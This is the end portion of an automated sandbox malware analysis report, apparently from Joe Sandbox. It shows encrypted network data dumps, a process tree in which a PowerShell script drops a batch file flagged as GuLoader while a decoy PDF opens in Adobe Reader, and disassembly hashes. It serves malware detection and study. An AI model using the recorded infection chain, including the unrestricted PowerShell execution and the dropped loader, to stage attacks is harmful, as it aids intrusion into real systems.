                                                        2023-06-01 10:14:14 UTC258INData Raw: 10 bb d1 c1 48 91 a8 c5 03 2d fa 0b f8 cf ba 9c 0e 94 7f 87 e0 cc 34 f4 c1 f3 8c c2 09 9b 82 5a 52 fe 18 91 0c dd a5 ac eb bf 9d cc 4a 20 3f 67 3a a5 71 c2 11 7b de 7d 94 f7 81 51 6e 90 77 b8 7c 80 c7 27 5f af bc f8 a4 46 84 95 5c 70 3c f1 a9 ab 22 20 90 a2 1e 02 f0 e5 c9 93 be 4b 31 ba 25 43 31 5a a5 b2 15 d6 c5 bc 1b 88 55 92 3a a8 8c 23 c2 0f 00 3d 6e 77 9e 01 21 d3 cf 02 2a f5 a6 02 8b d0 65 d6 9a 3d ca 12 30 c3 1b 05 a5 9d a2 45 54 7a 9b 58 fc bd 52 a1 5c 99 3e 38 b9 96 f0 9b c9 47 8d ef 9d 21 f9 7e 36 59 8d e8 1f b3 90 de 76 f6 b8 6d a6 c6 6a e1 0f ee 3c 59 93 4d ca 79 90 1c 1e e0 80 b7 3e 24 23 d1 bd 74 13 40 00 be fa e7 a7 94 67 c7 d2 42 56 aa ee c0 fa f6 e7 a5 5a 35 47 18 19 d0 ae 11 bf 75 78 00 56 de 0b 40 88 81 01 62 ff 4c 1d 45 9f b1 58 44 d4
                                                        Data Ascii: H-4ZRJ ?g:q{}Qnw|'_F\p<" K1%C1ZU:#=nw!*e=0ETzXR\>8G!~6Yvmj<YMy>$#t@gBVZ5GuxV@bLEXD
                                                        2023-06-01 10:14:14 UTC265INData Raw: 95 88 ff 63 a6 c3 a0 2e 7f f8 03 06 15 9d 98 cf b9 9f 48 97 c5 0a 92 3b 30 71 8c 5c 2e 30 9f b6 4d fe 46 a7 94 46 11 f4 2f 30 41 fc cd c8 64 a6 4d b5 f9 e0 dd 7b b2 65 5b a7 ca 7e dc 4b 2b d7 14 63 c2 59 fd 80 4d 48 89 88 bd f8 c0 d5 86 ef 43 1c 13 f5 c2 25 6d 94 c4 99 45 87 b6 09 1e d6 d7 7c 18 31 f8 0e 3f 36 62 0b 87 29 dc 45 43 9e 26 74 40 66 72 9a c8 28 ff 77 3f 33 a1 7a 5d e9 ab 91 b3 11 5f 3c b8 30 61 e0 8f 18 95 82 0a 7d af 64 b8 dc 24 33 d0 11 9b 9f f3 70 a4 dc 71 14 b6 a3 20 07 26 74 22 27 ca 05 3e b2 92 13 86 33 f9 81 55 ed f6 6e cf 96 1a 8a 28 d9 95 7a 2c 61 ff f8 aa e3 9f 70 27 29 58 2e d1 b5 d4 6b b5 fd fe 37 ef 0d 38 91 47 37 5f da 0a d7 c1 5c f7 49 b4 8e d1 66 4b ed ac 08 9e f0 fa bd 4b 96 b2 72 d6 eb 78 ae ed f4 f2 83 65 4e 56 5a 92 2e e6
                                                        Data Ascii: c.H;0q\.0MFF/0AdM{e[~K+cYMHC%mE|1?6b)EC&t@fr(w?3z]_<0a}d$3pq &t"'>3Un(z,ap')X.k78G7_\IfKKrxeNVZ.
                                                        2023-06-01 10:14:14 UTC273INData Raw: 0a fd 19 3a 6b 74 2f 05 bd b2 a0 f1 ac 41 cb 98 11 58 f3 2f cd 20 13 f2 df 0b f8 8d 1b 98 18 b8 fa 7f cc 2f b9 a9 87 44 67 9c 34 6d 2f 63 c6 4d d7 5b 1b 57 98 72 21 4b 58 cb 0f 28 4d cd 6d e9 74 aa a3 3b 91 f8 65 fc aa 0e 54 8a 2a 21 a2 14 17 d6 86 da 7c 6c e8 94 9a 40 d1 b1 b5 51 e1 3c d3 96 74 3e ba 03 66 4e b3 fc 95 e1 b0 c4 a9 87 e5 f9 a5 df 05 2d e7 1e 5f e8 dd a7 a9 00 39 38 da 19 9f 31 01 93 0a 77 1a d5 4e d5 47 8b 1f de 40 79 b7 ad e7 25 1b ba 80 30 e1 4b d3 6a f0 d6 c0 6b 5a 33 42 34 ed 73 92 a0 1b ee d1 2f a8 f8 4d fb b2 ee 10 58 af b5 8a d6 df 73 99 a2 e3 6b b7 50 82 c2 68 e0 36 92 ec 8d ef f7 0f 7e 76 a2 a1 37 eb a0 13 f2 f8 60 a2 7d 10 16 7c 2e 05 be 4c eb b9 47 d5 da 95 cc 68 c3 d4 f5 36 61 b4 23 8c f1 43 6b ae 80 05 67 e0 8c 6e 29 45 1a b6
                                                        Data Ascii: :kt/AX/ /Dg4m/cM[Wr!KX(Mmt;eT*!|l@Q<t>fN-_981wNG@y%0KjkZ3B4s/MXskPh6~v7`}|.LGh6a#Ckgn)E
                                                        2023-06-01 10:14:14 UTC281INData Raw: f9 9c 33 61 b2 bd b6 aa 7c 46 6f 7a d7 82 95 5e 27 b3 f1 d6 4f 42 27 94 ca ae 4a a6 e4 9f 74 7e b7 47 91 c8 4c 12 d7 9e 7b 77 f0 8f 91 d0 9a dc 8e 61 c4 11 ef 9a 7c c5 58 cd d8 e4 2e 08 13 63 fe e7 ef 3e f1 82 c1 a6 74 b2 50 cf cf 97 df 97 2b de f6 13 ab 23 ec 92 19 c4 2a 82 c1 be 5a 29 fc 92 51 5e 28 fc 79 fb 44 83 b8 b8 35 fe d9 e7 f6 2d 1f 27 07 38 9b 00 dc c9 3a cb bd 64 e0 33 cc 28 18 0a db 00 1a 8d 91 32 a0 6f a3 7a 69 32 d4 f2 50 5d ce f6 17 a3 b3 b9 e9 39 3e 23 5a 3e a8 4b 9f 02 8f be b7 5f 59 4a 97 20 51 e3 94 49 99 b5 03 2d 18 45 ee 35 41 3d 45 0c 80 32 c4 51 0c 95 21 f5 61 e9 cd f2 11 7b 55 71 ed 0c 00 8d f6 2e a0 29 88 a5 e8 96 b1 17 25 a2 25 02 9a a9 75 ff 41 9a bb 5c 9b 5d 2a 5d a9 bd 7e 2f 26 fe c8 32 9d 3f 89 70 e6 5e f0 ec 9d e0 a9 44 10
                                                        Data Ascii: 3a|Foz^'OB'Jt~GL{wa|X.c>tP+#*Z)Q^(yD5-'8:d3(2ozi2P]9>#Z>K_YJ QI-E5A=E2Q!a{Uq.)%%uA\]*]~/&2?p^D
                                                        2023-06-01 10:14:14 UTC289INData Raw: f6 08 a7 ee 45 10 70 3b 2f cb 29 d6 9e a2 d6 32 65 70 38 88 e0 d5 55 85 37 a6 86 68 0f 40 40 16 49 af 87 41 c6 55 ae 68 b3 5c 0a 70 64 48 92 70 fe bc ae 05 b3 cd 13 48 ef 88 a8 44 97 65 61 7e 29 c6 6d b0 35 f2 b6 59 cf 0f ae 0e 80 d3 cf ef f5 ea 03 93 2a ba 5a 25 35 d7 08 65 9f aa d5 b9 60 da b3 2d 55 2d a8 ab 5b 33 cf 47 83 ca b2 b2 0d 01 d5 17 f3 f4 38 16 eb 93 88 5a a7 00 06 a6 47 55 65 b3 d3 a8 b5 7a a3 8b c2 00 98 12 ac f8 0b f5 ff b4 ce 27 71 c5 75 44 9f ed b5 62 34 58 00 3f da f5 d6 fc e3 75 42 38 ea 16 4a 9b 86 27 2b 09 ac d3 c1 8f 4e 33 fb e2 1c 1e 94 08 2f 87 0e a6 59 a6 e9 a2 5b 4b ec 70 4e 2a 14 04 c4 f3 dd 30 87 02 a0 19 76 43 1f f2 17 8d 7e d1 25 1c 0e 85 af 3f ab 85 e7 04 31 aa 10 a9 69 6e 74 7d 10 5d 84 b4 73 f9 6e c5 26 63 79 5a cb 86 b4
                                                        Data Ascii: Ep;/)2ep8U7h@@IAUh\pdHpHDea~)m5Y*Z%5e`-U-[3G8ZGUez'quDb4X?uB8J'+N3/Y[KpN*0vC~%?1int}]sn&cyZ
                                                        2023-06-01 10:14:14 UTC297INData Raw: 83 65 9f 0a db b0 af f7 4b 23 87 b6 34 88 f1 9f ca c8 c8 46 8e 09 e0 4b 47 06 68 98 a1 d4 ed 0d ed e0 45 66 ba 1c 3f 70 0f f6 8e a9 42 4a 02 35 2a bc ad 3e 4a 94 7f 35 ce 36 1a f6 2a ed af 21 06 8b 7a 96 b7 66 fe 3e 0d b9 94 15 8d f1 34 2b ea 9b 2c 5d de 9c 3c 9c 30 ed 28 3f 31 af 9c 11 62 a5 05 fc b0 06 f7 aa b0 5f c9 b9 30 88 be b4 9f 54 82 85 a6 a6 e7 e0 bf 3a 77 d0 38 f5 56 2a 09 fd a8 70 27 99 fe 6b ed 7d c6 ea 6a ca 78 57 92 89 c3 55 25 3e 96 b3 b5 08 55 17 fb 6f db 8a c8 d8 e2 3a f1 3d 98 9b 05 9b 10 18 34 31 8d 51 d8 86 3c 63 0e 67 f8 24 41 d1 0f b9 45 d1 56 03 66 a4 a1 13 fa 34 30 e0 c9 d7 65 2b 00 75 f4 c4 34 77 17 50 99 34 25 93 f3 7f 21 de 61 c2 4c 65 df 93 da 61 24 d1 9e 85 de ca b0 75 1d b6 fd d8 58 f1 1f 82 c5 db 90 02 d5 fe ea 32 4e c0 b3
                                                        Data Ascii: eK#4FKGhEf?pBJ5*>J56*!zf>4+,]<0(?1b_0T:w8V*p'k}jxWU%>Uo:=41Q<cg$AEVf40e+u4wP4%!aLea$uX2N
                                                        2023-06-01 10:14:14 UTC304INData Raw: c5 bd 5d ea 80 6b d7 1b 4c 6a c4 95 03 ec ed ee 50 8a 01 89 94 1c d8 b9 26 0a ce de bc 07 ff 21 37 0d 5f c0 7b 5e 01 f9 6f 2e 21 a3 c5 ce 56 76 85 ab 0f 88 2d 86 f3 af cd e3 5a 85 e2 22 2a 8d b3 5b 9d 0d 17 50 6a ef a8 f4 2d e6 d8 f9 53 e8 e3 ea 68 19 fb a6 28 d1 99 3b 33 59 2c 47 1a c2 72 f7 41 de 8a 2c 37 18 44 c2 bb 48 bb ed cb 84 75 e5 34 68 be c3 a4 04 18 25 77 f6 dd 61 1d 49 68 ff 5e 5e 2d 4e 93 32 92 8e ec 8b 06 96 a8 1e 28 eb 74 c7 ab 91 c0 98 e1 2d a8 a4 5c d3 68 0c 0e b7 c0 24 63 99 ee ac 86 a1 01 fa ff 2b a0 9f d0 b4 7b 63 b6 31 1f da 4b df 72 30 99 28 ec 40 cd 06 2e 06 a7 e8 e1 72 98 be ae 4a 7a 01 3b 61 89 ae 5b 2b c2 48 ce 65 fa d4 75 cf 06 c3 a0 8f e3 c7 8a 53 cc 83 98 c2 e1 c9 f5 63 d5 ee cd 43 4e 2e a4 de 0a 04 4c f6 a2 8a f6 5c 1e 4c a8
                                                        Data Ascii: ]kLjP&!7_{^o.!Vv-Z"*[Pj-Sh(;3Y,GrA,7DHu4h%waIh^^-N2(t-\h$c+{c1Kr0(@.rJz;a[+HeuScCN.L\L
                                                        2023-06-01 10:14:14 UTC312INData Raw: 83 f4 7b ba 44 80 61 bf 29 0b 6e 96 8b f5 23 6d 98 58 cc dd 61 9c df b1 d9 a0 7c 0f 39 6f 01 82 10 09 bd a4 f9 ec 9d 26 fc f5 07 1e 2e eb c4 d2 83 0c 89 8f 7d e8 f0 41 ef 60 ef d8 9f 9d 75 a4 37 04 44 dd 08 ee 8c 5e ed 3a 7f 72 13 aa 2f 2a b2 5c f3 d8 f1 26 69 11 72 d3 d6 db 28 56 f4 b3 2f cb 25 83 90 dc ae 45 6e 1f 6d 10 b3 ae 70 2b e0 7c 8d 99 f0 db 2f ae 2a 78 20 e8 ae 98 2c b7 14 26 a6 64 97 fd 6b 4c fd 33 d6 83 42 62 45 5b 7c 08 a6 1c 66 a3 d3 4a 79 d3 a6 08 57 32 63 08 c9 10 7f 1f a1 e7 3a e5 a2 16 8f 64 34 be cd 1a 13 e0 e6 69 4d ca 48 cd ed 3f 17 00 e3 77 70 00 e3 08 c1 c5 ad 0f fb a1 82 fa d8 7d 24 36 4c 53 42 e5 22 28 0a b1 66 a6 d6 13 3f 5f 07 d5 18 74 b3 90 69 c9 f5 bb 53 8f d8 fe c9 54 56 ff a4 5f e6 93 e7 99 07 f6 5f 5b 7f 31 47 1c ac 93 7c
                                                        Data Ascii: {Da)n#mXa|9o&.}A`u7D^:r/*\&ir(V/%Enmp+|/*x ,&dkL3BbE[|fJyW2c:d4iMH?wp}$6LSB"(f?_tiSTV__[1G|
                                                        2023-06-01 10:14:14 UTC320INData Raw: 9d a2 e0 69 93 0f 84 c4 d3 8a 0a 05 0a bc dd 19 12 17 90 36 9d 3d dd 1d ad 0a 66 0c 8e db 7c fc 08 17 85 2a c5 ec ea 7e 28 e2 e5 dd 88 8d 80 77 77 42 94 d8 85 cb 1a a7 21 65 73 51 cf 76 d9 58 6f ef 21 93 58 82 d5 87 6c a7 38 db b1 c2 20 80 a5 5a e6 a8 9b 31 e8 bf ea ae 77 c3 69 07 d0 dd bc 2c 6e 19 1d 1a 6f d3 f6 e9 a2 99 89 8d e3 dc a6 2d 7c d5 b3 69 3b 08 95 ba 16 7e de ce 93 76 1e 05 76 3e ec cf fc 60 1f 06 1b d7 5b 18 4a 67 31 ec f0 d5 b6 a1 00 d0 14 6a 3d 56 dc c8 1c 0c 45 dd ae 32 71 42 a5 c7 30 2b c3 8f e1 86 90 42 fa 63 03 a9 9b 34 f7 52 90 eb f0 05 8a 41 67 10 83 8e 07 3e 58 76 5c 3f 6f b1 a2 53 f8 b9 e9 81 97 80 f7 3e ab e9 8c 1a 02 ce e8 f1 2f 10 f5 ac 67 05 59 95 46 57 af 86 83 11 e4 f9 a4 37 b4 1b f9 b0 eb 9a 06 c7 af d4 34 f0 ae a3 84 b9 e7
                                                        Data Ascii: i6=f|*~(wwB!esQvXo!Xl8 Z1wi,no-|i;~vv>`[Jg1j=VE2qB0+Bc4RAg>Xv\?oS>/gYFW74
                                                        2023-06-01 10:14:14 UTC328INData Raw: 93 cb 1d f6 87 3b 47 9a b6 de 49 bc 4f 9e e0 31 f2 b6 40 cd 7c 13 5c 69 dc 21 3d d2 1a 81 8f db 8d 57 89 b9 89 3e db 1f 9b f4 7a 19 93 de b0 03 bd e3 ee 03 09 86 87 d2 25 8d 90 51 0e 47 b3 a1 55 1c e7 d9 be a1 12 5f 99 91 d7 0f 43 95 96 33 a0 4d c9 9d f9 98 db 9d 7c cd 3b 80 b6 50 87 e2 27 59 cf ac dc c4 80 bb 95 c5 e3 b2 d1 2b 2c b1 e0 be 38 02 bc 7c 07 1d 8f 04 af d8 6f fa 7b 42 bb f8 9b 73 5e d8 44 a8 21 57 5a 7d 5c d1 3c 35 4a a4 f9 19 bd 2b ef af 3c d8 58 3e b7 16 ad 9b 41 3b 2f 80 19 81 bd 76 b9 14 87 c3 95 37 b2 6d cd c4 25 ba 56 0e df 58 78 26 96 6c 52 bd bd 2b 98 d3 7b 51 96 0c 2d 5e 86 b3 5b f0 ef c8 42 25 6b 91 53 de 9a f3 67 17 bb 7f 64 ec e4 16 c6 38 83 69 df 81 2a 59 15 28 58 c2 13 da 87 77 be 41 4f f4 f2 1c fb bb 1b c2 37 24 f6 89 ed 65 d5
                                                        Data Ascii: ;GIO1@|\i!=W>z%QGU_C3M|;P'Y+,8|o{Bs^D!WZ}\<5J+<X>A;/v7m%VXx&lR+{Q-^[B%kSgd8i*Y(XwAO7$e
                                                        2023-06-01 10:14:14 UTC336INData Raw: ad e7 00 41 12 bd 7c 50 6d 6b 1e 11 31 27 9e 3c 43 2b 1f 77 2a 0d 67 fb cc 09 f7 57 34 1c 4d 75 8b d4 36 52 0d 1e e3 99 cf 29 22 71 bb e2 56 ff e8 7c 16 b6 5c 01 00 80 5d 00 00 80 00 00 1e 0f cb 87 11 d8 ce 66 91 0f 83 1e ca fd 7b 33 d4 7f e9 b7 da 28 31 76 25 66 20 4d 2a 09 6d 6a f7 29 70 38 30 e7 cc 1d 56 17 b0 33 ba 47 46 e1 ec 9d a0 05 65 42 a2 ab b4 e0 13 ea 1b b9 7e c0 33 7e 58 39 6c 7e 61 d3 13 6d 5b 6f a8 d9 37 fd d3 6c c9 23 ba 79 3a 29 2e da 5c 1b 28 3b c5 84 24 cc 97 01 21 da c9 ff 31 41 87 2a e3 b9 92 5b 94 c7 21 85 38 7d f2 f2 e9 b5 52 97 ba 2a 10 a5 f0 45 63 ac 61 92 7f 8d db be 69 26 dc 22 03 c6 76 60 04 8f 8b f7 52 4e ce 96 33 9f a4 55 9b 34 49 5c d0 20 72 4d b7 1e e6 22 1c e5 b1 ae 97 fe 5c 80 89 07 b9 2d 80 c1 45 e6 d1 75 63 4c 68 f8 96
                                                        Data Ascii: A|Pmk1'<C+w*gW4Mu6R)"qV|\]f{3(1v%f M*mj)p80V3GFeB~3~X9l~am[o7l#y:).\(;$!1A*[!8}R*Ecai&"v`RN3U4I\ rM"\-EucLh


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:12:14:09
                                                        Start date:01/06/2023
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\eua.ps1
                                                        Imagebase:0x7ff7b3750000
                                                        File size:447488 bytes
                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        General

                                                        Target ID:1
                                                        Start time:12:14:09
                                                        Start date:01/06/2023
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff745070000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:2
                                                        Start time:12:14:14
                                                        Start date:01/06/2023
                                                        Path:C:\Users\Public\fcab.bat
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\Public\fcab.bat"
                                                        Imagebase:0x400000
                                                        File size:344681 bytes
                                                        MD5 hash:9DCA43CB15D97693D2DE73683804C5C7
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.645631516.0000000007E21000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 3%, ReversingLabs
                                                        Reputation:low

                                                        General

                                                        Target ID:3
                                                        Start time:12:14:21
                                                        Start date:01/06/2023
                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdf
                                                        Imagebase:0x1010000
                                                        File size:2571312 bytes
                                                        MD5 hash:B969CF0C7B2C443A99034881E8C8740A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:6
                                                        Start time:12:14:30
                                                        Start date:01/06/2023
                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                        Imagebase:0xec0000
                                                        File size:9475120 bytes
                                                        MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Disassembly

                                                        Reset < >

                                                          Executed Functions

                                                          Function 00007FFBAC0C126D Relevance: 5.4, Strings: 4, Instructions: 385COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.496894382.00007FFBAC0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC0C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffbac0c0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: gw$gw$gw$gw
                                                          • API String ID: 0-3049393443
                                                          • Opcode ID: a89a65790f0a7b8eb6425bd982ed42b49f760ab63c1ccb1125a76aecd94e58b4
                                                          • Instruction ID: daa07e09781b3f333232121c5175fb656f38f84e1b7746071ceaf5609acfe03b
                                                          • Opcode Fuzzy Hash: a89a65790f0a7b8eb6425bd982ed42b49f760ab63c1ccb1125a76aecd94e58b4
                                                          • Instruction Fuzzy Hash: DAB12CF290EB864FE7AAD638985917477D1EF65220B0801BFD44EC75D3DE18EC168392
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFBAC0C13F4 Relevance: 2.6, Strings: 2, Instructions: 97COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.496894382.00007FFBAC0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC0C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffbac0c0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: gw$gw
                                                          • API String ID: 0-1318933218
                                                          • Opcode ID: c271180e3d3085ff0adc1aceb85b9a5b3831920c157d2984a32e438b312b9b62
                                                          • Instruction ID: a92eaee8229c5cbe44493c4673f6cd18e2bfb497298c7d20ce5998c08df45c20
                                                          • Opcode Fuzzy Hash: c271180e3d3085ff0adc1aceb85b9a5b3831920c157d2984a32e438b312b9b62
                                                          • Instruction Fuzzy Hash: 2E21E4F2E0EA4A4FE7BAD638885917466D2EF64611B5800FBD90FC72D3DE1CEC168245
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFBAC0C2135 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.496894382.00007FFBAC0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC0C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffbac0c0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: gw
                                                          • API String ID: 0-3865893628
                                                          • Opcode ID: 9b443248c800cbb2711aa33b53864c1f233da6cbb38535f9f6ac3e5ba604139d
                                                          • Instruction ID: b47529bb47df60e1d8b71f0c6ca752917d18c595267859f1eae33e8469c6baf7
                                                          • Opcode Fuzzy Hash: 9b443248c800cbb2711aa33b53864c1f233da6cbb38535f9f6ac3e5ba604139d
                                                          • Instruction Fuzzy Hash: 5D4118D2E0FA8A4FFAB6E238985817467D1EF65611B1805FBC94DC75D3EE08DC098351
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFBAC0C2147 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.496894382.00007FFBAC0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC0C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffbac0c0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: gw
                                                          • API String ID: 0-3865893628
                                                          • Opcode ID: ea51a40ced280700a0afac0a9d050816c530d965e6283fc2ca4589d321bbbad6
                                                          • Instruction ID: c20a298323a2a924aa4ea821424c60c2de8a711e5656c83dbcb57bf4ec3d4c65
                                                          • Opcode Fuzzy Hash: ea51a40ced280700a0afac0a9d050816c530d965e6283fc2ca4589d321bbbad6
                                                          • Instruction Fuzzy Hash: 0521F6D3E0FACA5FFABBE23858591785AD0EF6566071804BBD94DC74D3ED089C194311
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFBABFF3FC2 Relevance: .9, Instructions: 860COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.496720875.00007FFBABFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABFF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffbabff0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e3711a072f79ce3ca4d1332379bfb351a409b982564a7c9695e066f286602214
                                                          • Instruction ID: bcad2bbababa1ed5ba9de847a13c6faf8de597acb3b71dfb669ae419d1b23d12
                                                          • Opcode Fuzzy Hash: e3711a072f79ce3ca4d1332379bfb351a409b982564a7c9695e066f286602214
                                                          • Instruction Fuzzy Hash: EE223C71A0DA4A8FDB56DF3CC4915E97BE0FF95311B0881BBD449CB1A3DA25AC4AC780
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFBABFF284C Relevance: .4, Instructions: 375COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.496720875.00007FFBABFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABFF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffbabff0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 23ca532a1628b7cc0325019bdbb385d307ff38badb556bbf337f6192d3e22d5d
                                                          • Instruction ID: 537df4221d3cfafd031cb8bd8d9e6b55f07c79bd2816154a46d49d027be51e78
                                                          • Opcode Fuzzy Hash: 23ca532a1628b7cc0325019bdbb385d307ff38badb556bbf337f6192d3e22d5d
                                                          • Instruction Fuzzy Hash: 83A14872A0D6494FE71AEB3CD8555F57BE0EF96320B0400BEE489C71A3DA25A847C751
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFBABFF296C Relevance: .1, Instructions: 128COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.496720875.00007FFBABFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABFF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffbabff0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4125ad134e26262c6371ec92cd9859383beabf7580fce53cca6952d33360c060
                                                          • Instruction ID: bf5f8e1fe5828ab4ccef1f726eae3db6460a37df302bbc38365871cb84f264c4
                                                          • Opcode Fuzzy Hash: 4125ad134e26262c6371ec92cd9859383beabf7580fce53cca6952d33360c060
                                                          • Instruction Fuzzy Hash: A731077162CA094FD75DDA2CC895971B7E1FB98314B14417DE88EC3266EA26FC43CB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFBAC0C466C Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.496894382.00007FFBAC0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC0C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffbac0c0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9b6f8c19b0e0be6243b3c80a25a55eebeb0bfc1016efd4b0111d18de67ad1fa3
                                                          • Instruction ID: 9e3911f0bb86ea76759e99c149bac073b478b1f3cd403f6292396607e3626974
                                                          • Opcode Fuzzy Hash: 9b6f8c19b0e0be6243b3c80a25a55eebeb0bfc1016efd4b0111d18de67ad1fa3
                                                          • Instruction Fuzzy Hash: BA1108F2A0DA894FEB66D6A884485B877D1EF59324B0801BFC44DCB1D7CF24A816C762
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFBABFF1755 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.496720875.00007FFBABFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABFF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffbabff0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d0b51852a536b454e05ac1f754ac60b49105048c3f4f6cfe66bc83972c063645
                                                          • Instruction ID: c6dc56ac7152edae77b4259ca54310baf13d43721f6d3e6b6f2dcf853d97f8bb
                                                          • Opcode Fuzzy Hash: d0b51852a536b454e05ac1f754ac60b49105048c3f4f6cfe66bc83972c063645
                                                          • Instruction Fuzzy Hash: 8001677111CB0C8FDB48EF0CE451AA6B7E0FB95364F10056DE59AC3661DA36E882CB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFBABFF43D8 Relevance: .0, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.496720875.00007FFBABFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABFF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffbabff0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
